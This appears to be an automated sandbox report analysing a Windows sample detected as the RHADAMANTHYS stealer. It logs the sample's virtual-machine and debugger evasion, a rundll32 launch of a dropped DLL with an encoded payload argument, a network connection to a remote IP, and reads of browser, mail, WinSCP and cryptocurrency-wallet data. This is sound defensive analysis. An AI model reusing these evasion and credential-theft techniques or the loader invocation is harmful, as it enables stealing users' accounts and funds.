                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\vboxtray.exeJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: VBoxTrayIPCJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\vboxhook.dllJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: \pipe\VBoxTrayIPCJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sysJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: VBoxMiniRdrDNJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_00403317 GetSystemInfo,VirtualQuery,KiUserExceptionDispatcher,VirtualQuery,1_2_00403317
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA828C _calloc_dbg,FindFirstFileW,FindNextFileW,4_2_00007DF471DA828C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA782C FindFirstFileW,FindNextFileW,FindClose,4_2_00007DF471DA782C
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeAPI call chain: ExitProcess graph end nodegraph_1-4346
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                      Source: rundll32.exe, 00000004.00000003.408357863.0000017ED6ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW b
                      Source: MqE1p1WFrf.exe, 00000001.00000003.349875511.0000000000477000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware ToolsE-2E35-11D2-B604-00104B703EFD}\REGISTRY\MACHINE\SOFTWARE\Clas\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Toolsc
                      Source: MqE1p1WFrf.exe, 00000001.00000003.349875511.0000000000477000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GY\MACHINE\SOFTWARE\VMware, Inc.\VMware ToolsInformationTarget Id 0\Logical Unit Id 0
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358805117.0000000002C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLink0c9f}SymbolicLink
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: rundll32.exe, 00000004.00000003.408357863.0000017ED6ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358805117.0000000002C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinke5d05f0c9f}SymbolicLink
                      Source: rundll32.exe, 00000004.00000003.408357863.0000017ED6ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358259784.0000000002170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkSymbolicLink

                      Anti Debugging

                      barindex
                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE91A8 IsDebuggerPresent,IsProcessorFeaturePresent,4_2_00007FFA06EE91A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE6694 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_00007FFA06EE6694
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_004081BD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004081BD
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_00403484 GetModuleHandleA,IsBadCodePtr,VirtualProtect,GetProcessHeap,RtlAllocateHeap,IsBadCodePtr,IsBadReadPtr,IsBadStringPtrA,lstrlenA,GetProcessHeap,HeapAlloc,1_2_00403484
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugFlagsJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeMemory protected: page execute and read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 179.43.163.126 80Jump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns60877c.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8dw|ae8angbgowbjrwaxahyhaeljaejvadaawi0cwuid|+wo6aqcaabi|4pekmpmzmxm|4lejbhiivqkvxbiiuwkcf0bsp+lrcqwsikejpabathibwaismde2yqqlqhrdoebeejxg8abjweqgqfaso05lgbzjz8diwwk|0gdyeilwuil9uyravr7aaprsit|yoojiajrwwyfv2viiwqlyppwm||jsitqgeg70f90nkidwibii|8csdvcdcpmg|94sbh1gkylqp9qzkgdogt0b+4reut1cbeqebau|3qfsisa69vi64ti|qdbagbau1x|vldbvefvqvb7qvddawabou1a|02l+eyl8kil79kphfzz8exjsf88qye8cvbfao8ad4xq8|bbi4t7cyjz8ixasi087wephnzqeyo8cd2mlqephmfz8esl|2cgritfhit3|yrei08ytaph|0wd2ugd8tpjv0wfyq+epppwtf+lxegleeuz0v9ia9okaotadp8dqchkdq++wn76aafea9c|exxs|0gb+qr8dxx0|w6dwqfjg8ae|0e7yxnp68al|8eptwxoryss|4tma+t0wdptvqoqdffbixtbanp|m8mkakylwuu3d8hjybedyouqafdbigdveo0zwdof9ke7dlbgekyag||gayp4chlu6|8ksivlqf|vsd+jbpedxeqqxatfo28ycq9mauff|0feqv1bxf9e+11bmxdigexgaf5kaivp6gb+||+|sixad4sydsbm9y2vaysremgz|+j9m30gjv8eti1f|0yz0ovl|1qk|wiaieyl4a+ea3p1iewoedpai9orif9iixwkikygciagp0il8a+es3ugpid|ueinvghejuffqeinjcsfeuil79jofp1+ii1wsgreibdiiczz8ohn7ya|risgjvciqscmil1yyigjhcsahxle9vpwiw7aifijjctycrehmjeg6dhviiuc|i0ytitdokid+|tssiogmeyjzctvoeylpboytilcboqbhctchxggko0ru41hszcmjpdz8enfi9to6fwfmiqc7ngysi2eedjbgpn|iy1pbeqwgkqcf4ppaxxzgbx4mv8humv4du2lhlsk9cixlct4nqhc|0g72hi4g|psv3yzri1jqpoalkdbuacyakygqmoi+od0gus2mmaxsy1u+yrsksbjg+hs6n1rgjbii86mihhi|4x|dbklvujm|i4wgzfijuwkqp8p10ibxhqhysqtcc0b
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns60877c.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8dw|ae8angbgowbjrwaxahyhaeljaejvadaawi0cwuid|+wo6aqcaabi|4pekmpmzmxm|4lejbhiivqkvxbiiuwkcf0bsp+lrcqwsikejpabathibwaismde2yqqlqhrdoebeejxg8abjweqgqfaso05lgbzjz8diwwk|0gdyeilwuil9uyravr7aaprsit|yoojiajrwwyfv2viiwqlyppwm||jsitqgeg70f90nkidwibii|8csdvcdcpmg|94sbh1gkylqp9qzkgdogt0b+4reut1cbeqebau|3qfsisa69vi64ti|qdbagbau1x|vldbvefvqvb7qvddawabou1a|02l+eyl8kil79kphfzz8exjsf88qye8cvbfao8ad4xq8|bbi4t7cyjz8ixasi087wephnzqeyo8cd2mlqephmfz8esl|2cgritfhit3|yrei08ytaph|0wd2ugd8tpjv0wfyq+epppwtf+lxegleeuz0v9ia9okaotadp8dqchkdq++wn76aafea9c|exxs|0gb+qr8dxx0|w6dwqfjg8ae|0e7yxnp68al|8eptwxoryss|4tma+t0wdptvqoqdffbixtbanp|m8mkakylwuu3d8hjybedyouqafdbigdveo0zwdof9ke7dlbgekyag||gayp4chlu6|8ksivlqf|vsd+jbpedxeqqxatfo28ycq9mauff|0feqv1bxf9e+11bmxdigexgaf5kaivp6gb+||+|sixad4sydsbm9y2vaysremgz|+j9m30gjv8eti1f|0yz0ovl|1qk|wiaieyl4a+ea3p1iewoedpai9orif9iixwkikygciagp0il8a+es3ugpid|ueinvghejuffqeinjcsfeuil79jofp1+ii1wsgreibdiiczz8ohn7ya|risgjvciqscmil1yyigjhcsahxle9vpwiw7aifijjctycrehmjeg6dhviiuc|i0ytitdokid+|tssiogmeyjzctvoeylpboytilcboqbhctchxggko0ru41hszcmjpdz8enfi9to6fwfmiqc7ngysi2eedjbgpn|iy1pbeqwgkqcf4ppaxxzgbx4mv8humv4du2lhlsk9cixlct4nqhc|0g72hi4g|psv3yzri1jqpoalkdbuacyakygqmoi+od0gus2mmaxsy1u+yrsksbjg+hs6n1rgjbii86mihhi|4x|dbklvujm|i4wgzfijuwkqp8p10ibxhqhysqtcc0bJump to behavior
                      Source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                      Source: rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WindowOverrideScaleFactorShell_TrayWnd[
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
                      Source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
                      Source: MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE1DD4 cpuid 4_2_00007FFA06EE1DD4
                      Source: C:\Windows\System32\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DAB92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,4_2_00007DF471DAB92C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE3198 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,4_2_00007FFA06EE3198
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_00404608 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,1_2_00404608

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8d50000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8ee0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8d50000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8e60000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.353314399.0000017ED8C6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353657620.0000017ED8E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.406415950.0000017ED8D42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.384266045.0000017ED94B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.383899245.0000017ED92B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8d50000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8ee0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8d50000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8e60000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.353314399.0000017ED8C6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353657620.0000017ED8E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.406415950.0000017ED8D42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.384266045.0000017ED94B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.383899245.0000017ED92B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DAB92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,4_2_00007DF471DAB92C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD48E4 socket,bind,4_2_00007DF471DD48E4

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts221
                      Windows Management Instrumentation                      		Path Interception13
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Email Collection                      		Exfiltration Over Other Network Medium2
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts12
                      Command and Scripting Interpreter                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts35
                      Virtualization/Sandbox Evasion                      		21
                      Input Capture                      		771
                      Security Software Discovery                      		Remote Desktop Protocol21
                      Input Capture                      		Exfiltration Over Bluetooth2
                      Ingress Tool Transfer                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts2
                      Native API                      		Logon Script (Windows)Logon Script (Windows)1
                      Disable or Modify Tools                      		1
                      Credentials in Registry                      		35
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Archive Collected Data                      		Automated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                      Process Injection                      		NTDS12
                      Process Discovery                      		Distributed Component Object Model1
                      Data from Local System                      		Scheduled Transfer1
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Rundll32                      		Cached Domain Credentials257
                      System Information Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.